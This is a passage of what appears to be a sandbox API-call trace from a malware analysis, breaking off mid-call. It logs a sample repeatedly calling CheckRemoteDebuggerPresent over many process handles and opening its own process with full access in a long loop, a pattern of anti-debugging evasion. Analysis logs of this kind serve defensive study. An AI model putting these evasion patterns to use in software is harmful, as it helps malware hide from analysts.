CheckRemoteDebuggerPresent (in: hProcess=0x61c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.220] GetExitCodeProcess (in: hProcess=0x620, lpExitCode=0x28ad188 | out: lpExitCode=0x28ad188*=0x103) returned 1 [0169.220] CheckRemoteDebuggerPresent (in: hProcess=0x620, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.220] GetExitCodeProcess (in: hProcess=0x624, lpExitCode=0x28ad240 | out: lpExitCode=0x28ad240*=0x103) returned 1 [0169.220] CheckRemoteDebuggerPresent (in: hProcess=0x624, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.220] GetExitCodeProcess (in: hProcess=0x628, lpExitCode=0x28ad2f8 | out: lpExitCode=0x28ad2f8*=0x103) returned 1 [0169.220] CheckRemoteDebuggerPresent (in: hProcess=0x628, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.220] GetExitCodeProcess (in: hProcess=0x62c, lpExitCode=0x28ad3b0 | out: lpExitCode=0x28ad3b0*=0x103) returned 1 [0169.220] CheckRemoteDebuggerPresent (in: hProcess=0x62c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.220] GetExitCodeProcess (in: hProcess=0x630, lpExitCode=0x28ad468 | out: lpExitCode=0x28ad468*=0x103) returned 1 [0169.220] CheckRemoteDebuggerPresent (in: hProcess=0x630, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.220] GetExitCodeProcess (in: hProcess=0x634, lpExitCode=0x28ad520 | out: lpExitCode=0x28ad520*=0x103) returned 1 [0169.221] CheckRemoteDebuggerPresent (in: hProcess=0x634, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.221] GetExitCodeProcess (in: hProcess=0x638, lpExitCode=0x28ad5d8 | out: lpExitCode=0x28ad5d8*=0x103) returned 1 [0169.221] CheckRemoteDebuggerPresent (in: hProcess=0x638, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.221] GetExitCodeProcess (in: hProcess=0x63c, lpExitCode=0x28ad690 | out: lpExitCode=0x28ad690*=0x103) returned 1 [0169.221] CheckRemoteDebuggerPresent (in: hProcess=0x63c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.221] GetExitCodeProcess (in: hProcess=0x640, lpExitCode=0x28ad748 | out: lpExitCode=0x28ad748*=0x103) returned 1 [0169.221] CheckRemoteDebuggerPresent (in: hProcess=0x640, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.221] GetExitCodeProcess (in: hProcess=0x644, lpExitCode=0x28ad800 | out: lpExitCode=0x28ad800*=0x103) returned 1 [0169.221] CheckRemoteDebuggerPresent (in: hProcess=0x644, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.221] GetExitCodeProcess (in: hProcess=0x648, lpExitCode=0x28ad8b8 | out: lpExitCode=0x28ad8b8*=0x103) returned 1 [0169.221] CheckRemoteDebuggerPresent (in: hProcess=0x648, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.222] GetCurrentProcessId () returned 0x530 [0169.222] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x64c [0169.222] GetExitCodeProcess (in: hProcess=0x64c, lpExitCode=0x28ad970 | out: lpExitCode=0x28ad970*=0x103) returned 1 [0169.222] CheckRemoteDebuggerPresent (in: hProcess=0x64c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.222] GetExitCodeProcess (in: hProcess=0x650, lpExitCode=0x28ada28 | out: lpExitCode=0x28ada28*=0x103) returned 1 [0169.222] CheckRemoteDebuggerPresent (in: hProcess=0x650, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.222] GetExitCodeProcess (in: hProcess=0x654, lpExitCode=0x28adae0 | out: lpExitCode=0x28adae0*=0x103) returned 1 [0169.222] CheckRemoteDebuggerPresent (in: hProcess=0x654, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.222] GetExitCodeProcess (in: hProcess=0x658, lpExitCode=0x28adb98 | out: lpExitCode=0x28adb98*=0x103) returned 1 [0169.222] CheckRemoteDebuggerPresent (in: hProcess=0x658, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.223] GetExitCodeProcess (in: hProcess=0x65c, lpExitCode=0x28adc50 | out: lpExitCode=0x28adc50*=0x103) returned 1 [0169.223] CheckRemoteDebuggerPresent (in: hProcess=0x65c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.223] GetExitCodeProcess (in: hProcess=0x660, lpExitCode=0x28add08 | out: lpExitCode=0x28add08*=0x103) returned 1 [0169.223] CheckRemoteDebuggerPresent (in: hProcess=0x660, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.223] GetExitCodeProcess (in: hProcess=0x664, lpExitCode=0x28addc0 | out: lpExitCode=0x28addc0*=0x103) returned 1 [0169.223] CheckRemoteDebuggerPresent (in: hProcess=0x664, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.223] GetExitCodeProcess (in: hProcess=0x668, lpExitCode=0x28ade78 | out: lpExitCode=0x28ade78*=0x103) returned 1 [0169.223] CheckRemoteDebuggerPresent (in: hProcess=0x668, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.223] GetExitCodeProcess (in: hProcess=0x66c, lpExitCode=0x28adf30 | out: lpExitCode=0x28adf30*=0x103) returned 1 [0169.223] CheckRemoteDebuggerPresent (in: hProcess=0x66c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.223] GetExitCodeProcess (in: hProcess=0x670, lpExitCode=0x28adfe8 | out: lpExitCode=0x28adfe8*=0x103) returned 1 [0169.224] CheckRemoteDebuggerPresent (in: hProcess=0x670, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.224] GetExitCodeProcess (in: hProcess=0x674, lpExitCode=0x28ae0a0 | out: lpExitCode=0x28ae0a0*=0x103) returned 1 [0169.224] CheckRemoteDebuggerPresent (in: hProcess=0x674, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.224] GetExitCodeProcess (in: hProcess=0x678, lpExitCode=0x28ae158 | out: lpExitCode=0x28ae158*=0x103) returned 1 [0169.224] CheckRemoteDebuggerPresent (in: hProcess=0x678, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.224] GetExitCodeProcess (in: hProcess=0x67c, lpExitCode=0x28ae210 | out: lpExitCode=0x28ae210*=0x103) returned 1 [0169.224] CheckRemoteDebuggerPresent (in: hProcess=0x67c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.224] GetExitCodeProcess (in: hProcess=0x680, lpExitCode=0x28ae2c8 | out: lpExitCode=0x28ae2c8*=0x103) returned 1 [0169.224] CheckRemoteDebuggerPresent (in: hProcess=0x680, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.224] GetExitCodeProcess (in: hProcess=0x684, lpExitCode=0x28ae380 | out: lpExitCode=0x28ae380*=0x103) returned 1 [0169.224] CheckRemoteDebuggerPresent (in: hProcess=0x684, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.224] GetExitCodeProcess (in: hProcess=0x688, lpExitCode=0x28ae438 | out: lpExitCode=0x28ae438*=0x103) returned 1 [0169.225] CheckRemoteDebuggerPresent (in: hProcess=0x688, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.225] GetExitCodeProcess (in: hProcess=0x68c, lpExitCode=0x28ae4f0 | out: lpExitCode=0x28ae4f0*=0x103) returned 1 [0169.225] CheckRemoteDebuggerPresent (in: hProcess=0x68c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.225] GetExitCodeProcess (in: hProcess=0x690, lpExitCode=0x28ae5a8 | out: lpExitCode=0x28ae5a8*=0x103) returned 1 [0169.225] CheckRemoteDebuggerPresent (in: hProcess=0x690, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.225] GetExitCodeProcess (in: hProcess=0x694, lpExitCode=0x28ae660 | out: lpExitCode=0x28ae660*=0x103) returned 1 [0169.225] CheckRemoteDebuggerPresent (in: hProcess=0x694, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.225] GetExitCodeProcess (in: hProcess=0x698, lpExitCode=0x28ae718 | out: lpExitCode=0x28ae718*=0x103) returned 1 [0169.225] CheckRemoteDebuggerPresent (in: hProcess=0x698, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.225] GetExitCodeProcess (in: hProcess=0x69c, lpExitCode=0x28ae7d0 | out: lpExitCode=0x28ae7d0*=0x103) returned 1 [0169.225] CheckRemoteDebuggerPresent (in: hProcess=0x69c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.226] GetExitCodeProcess (in: hProcess=0x6a0, lpExitCode=0x28ae888 | out: lpExitCode=0x28ae888*=0x103) returned 1 [0169.226] CheckRemoteDebuggerPresent (in: hProcess=0x6a0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.226] GetExitCodeProcess (in: hProcess=0x6a4, lpExitCode=0x28ae940 | out: lpExitCode=0x28ae940*=0x103) returned 1 [0169.226] CheckRemoteDebuggerPresent (in: hProcess=0x6a4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.226] GetExitCodeProcess (in: hProcess=0x6a8, lpExitCode=0x28ae9f8 | out: lpExitCode=0x28ae9f8*=0x103) returned 1 [0169.226] CheckRemoteDebuggerPresent (in: hProcess=0x6a8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.226] GetExitCodeProcess (in: hProcess=0x6ac, lpExitCode=0x28aeab0 | out: lpExitCode=0x28aeab0*=0x103) returned 1 [0169.226] CheckRemoteDebuggerPresent (in: hProcess=0x6ac, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.226] GetExitCodeProcess (in: hProcess=0x6b0, lpExitCode=0x28aeb68 | out: lpExitCode=0x28aeb68*=0x103) returned 1 [0169.226] CheckRemoteDebuggerPresent (in: hProcess=0x6b0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.226] GetExitCodeProcess (in: hProcess=0x6b4, lpExitCode=0x28aec20 | out: lpExitCode=0x28aec20*=0x103) returned 1 [0169.227] CheckRemoteDebuggerPresent (in: hProcess=0x6b4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.227] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x6b8 [0169.227] GetExitCodeProcess (in: hProcess=0x6b8, lpExitCode=0x28aecd8 | out: lpExitCode=0x28aecd8*=0x103) returned 1 [0169.227] CheckRemoteDebuggerPresent (in: hProcess=0x6b8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.227] GetCurrentProcessId () returned 0x530 [0169.227] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x700 [0169.227] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x7ac [0169.228] GetCurrentProcessId () returned 0x530 [0169.228] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x7b0 [0169.228] GetCurrentProcessId () returned 0x530 [0169.228] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x868 [0169.228] GetCurrentProcessId () returned 0x530 [0169.228] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x8d8 [0169.228] GetCurrentProcessId () returned 0x530 [0169.229] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x918 [0169.229] GetCurrentProcessId () returned 0x530 [0169.229] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x9cc [0169.230] GetCurrentProcessId () returned 0x530 [0169.230] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0xa38 [0169.230] GetCurrentProcessId () returned 0x530 [0169.230] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0xa7c [0169.230] GetCurrentProcessId () returned 0x530 [0169.230] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0xb30 [0169.230] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0xbdc [0169.230] GetCurrentProcessId () returned 0x530 [0169.230] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0xbe0 [0169.231] GetCurrentProcessId () returned 0x530 [0169.231] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0xc98 [0169.231] GetCurrentProcessId () returned 0x530 [0169.231] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0xd48 [0169.231] GetCurrentProcessId () returned 0x530 [0169.231] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0xddc [0169.231] GetCurrentProcessId () returned 0x530 [0169.231] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0xdfc [0169.232] GetCurrentProcessId () returned 0x530 [0169.232] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0xeac [0169.232] GetCurrentProcessId () returned 0x530 [0169.232] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0xf60 [0169.232] GetCurrentProcessId () returned 0x530 [0169.232] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1014 [0169.232] GetCurrentProcessId () returned 0x530 [0169.233] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1040 [0169.233] GetCurrentProcessId () returned 0x530 [0169.233] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x10c8 [0169.233] GetCurrentProcessId () returned 0x530 [0169.233] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1178 [0169.233] GetCurrentProcessId () returned 0x530 [0169.233] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x122c [0169.233] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x12dc [0169.234] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1318 [0169.234] GetCurrentProcessId () returned 0x530 [0169.234] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1390 [0169.234] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1444 [0169.234] GetCurrentProcessId () returned 0x530 [0169.234] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x14f8 [0169.235] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x15a8 [0169.235] GetCurrentProcessId () returned 0x530 [0169.235] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x165c [0169.235] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1688 [0169.235] GetCurrentProcessId () returned 0x530 [0169.235] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1710 [0169.235] GetCurrentProcessId () returned 0x530 [0169.235] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x17c0 [0169.236] GetCurrentProcessId () returned 0x530 [0169.236] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1878 [0169.236] GetCurrentProcessId () returned 0x530 [0169.236] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1928 [0169.236] GetCurrentProcessId () returned 0x530 [0169.236] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x19dc [0169.237] GetCurrentProcessId () returned 0x530 [0169.237] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1a8c [0169.237] GetCurrentProcessId () returned 0x530 [0169.237] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1aa8 [0169.237] GetCurrentProcessId () returned 0x530 [0169.237] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1b40 [0169.237] GetCurrentProcessId () returned 0x530 [0169.237] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1bf0 [0169.238] GetCurrentProcessId () returned 0x530 [0169.238] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1ca8 [0169.238] GetCurrentProcessId () returned 0x530 [0169.238] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1d58 [0169.238] GetCurrentProcessId () returned 0x530 [0169.238] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1e0c [0169.238] GetCurrentProcessId () returned 0x530 [0169.238] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1ebc [0169.239] GetCurrentProcessId () returned 0x530 [0169.239] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1f70 [0169.239] GetCurrentProcessId () returned 0x530 [0169.239] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x1f98 [0169.239] GetCurrentProcessId () returned 0x530 [0169.239] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2024 [0169.239] GetCurrentProcessId () returned 0x530 [0169.239] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x20d8 [0169.240] GetCurrentProcessId () returned 0x530 [0169.240] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2188 [0169.240] GetCurrentProcessId () returned 0x530 [0169.240] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x223c [0169.240] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x22ec [0169.240] GetCurrentProcessId () returned 0x530 [0169.240] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x23a0 [0169.241] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2454 [0169.241] GetCurrentProcessId () returned 0x530 [0169.241] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2508 [0169.241] GetCurrentProcessId () returned 0x530 [0169.241] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2588 [0169.241] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x25b8 [0169.242] GetCurrentProcessId () returned 0x530 [0169.242] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x266c [0169.242] GetCurrentProcessId () returned 0x530 [0169.242] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2720 [0169.242] GetCurrentProcessId () returned 0x530 [0169.242] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x27d0 [0169.242] GetCurrentProcessId () returned 0x530 [0169.242] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2888 [0169.243] GetCurrentProcessId () returned 0x530 [0169.243] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2938 [0169.243] GetCurrentProcessId () returned 0x530 [0169.243] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x29ec [0169.243] GetCurrentProcessId () returned 0x530 [0169.243] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2a9c [0169.243] GetCurrentProcessId () returned 0x530 [0169.243] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2b50 [0169.244] GetCurrentProcessId () returned 0x530 [0169.244] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2c04 [0169.244] GetCurrentProcessId () returned 0x530 [0169.244] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2ca8 [0169.244] GetCurrentProcessId () returned 0x530 [0169.244] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2cb8 [0169.244] GetCurrentProcessId () returned 0x530 [0169.245] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2d68 [0169.245] GetCurrentProcessId () returned 0x530 [0169.245] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2e1c [0169.245] GetCurrentProcessId () returned 0x530 [0169.245] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2ecc [0169.246] GetCurrentProcessId () returned 0x530 [0169.246] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2f80 [0169.246] GetCurrentProcessId () returned 0x530 [0169.246] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3034 [0169.246] GetCurrentProcessId () returned 0x530 [0169.246] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x30e8 [0169.246] GetCurrentProcessId () returned 0x530 [0169.246] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3198 [0169.247] GetCurrentProcessId () returned 0x530 [0169.247] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x324c [0169.247] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x32fc [0169.247] GetCurrentProcessId () returned 0x530 [0169.247] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x33b0 [0169.247] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3464 [0169.248] GetCurrentProcessId () returned 0x530 [0169.248] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3518 [0169.248] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3530 [0169.248] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x35c8 [0169.248] GetCurrentProcessId () returned 0x530 [0169.248] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x367c [0169.249] GetCurrentProcessId () returned 0x530 [0169.249] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3730 [0169.249] GetCurrentProcessId () returned 0x530 [0169.249] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x37e0 [0169.249] GetCurrentProcessId () returned 0x530 [0169.249] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3898 [0169.249] GetCurrentProcessId () returned 0x530 [0169.249] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3948 [0169.250] GetCurrentProcessId () returned 0x530 [0169.250] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x39fc [0169.250] GetCurrentProcessId () returned 0x530 [0169.250] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3aac [0169.250] GetCurrentProcessId () returned 0x530 [0169.250] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3b60 [0169.250] GetCurrentProcessId () returned 0x530 [0169.250] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3c14 [0169.251] GetCurrentProcessId () returned 0x530 [0169.251] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3cc8 [0169.251] GetCurrentProcessId () returned 0x530 [0169.251] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3d78 [0169.251] GetCurrentProcessId () returned 0x530 [0169.251] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3e2c [0169.251] GetCurrentProcessId () returned 0x530 [0169.251] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3edc [0169.252] GetCurrentProcessId () returned 0x530 [0169.252] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3f70 [0169.252] GetCurrentProcessId () returned 0x530 [0169.252] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3f90 [0169.252] GetCurrentProcessId () returned 0x530 [0169.252] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x4044 [0169.252] GetCurrentProcessId () returned 0x530 [0169.252] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x40f8 [0169.253] GetCurrentProcessId () returned 0x530 [0169.253] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x41a8 [0169.253] GetCurrentProcessId () returned 0x530 [0169.253] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x425c [0169.253] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x430c [0169.253] GetCurrentProcessId () returned 0x530 [0169.253] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x43c0 [0169.254] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x4474 [0169.254] GetCurrentProcessId () returned 0x530 [0169.254] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x4528 [0169.254] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x45d8 [0169.254] GetCurrentProcessId () returned 0x530 [0169.254] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x468c [0169.255] GetCurrentProcessId () returned 0x530 [0169.255] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x4740 [0169.255] GetCurrentProcessId () returned 0x530 [0169.255] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x47f0 [0169.255] GetCurrentProcessId () returned 0x530 [0169.255] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x48a8 [0169.255] GetCurrentProcessId () returned 0x530 [0169.255] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x4958 [0169.256] GetCurrentProcessId () returned 0x530 [0169.256] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x4a0c [0169.256] GetCurrentProcessId () returned 0x530 [0169.256] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x4abc [0169.256] GetCurrentProcessId () returned 0x530 [0169.256] OpenProcess 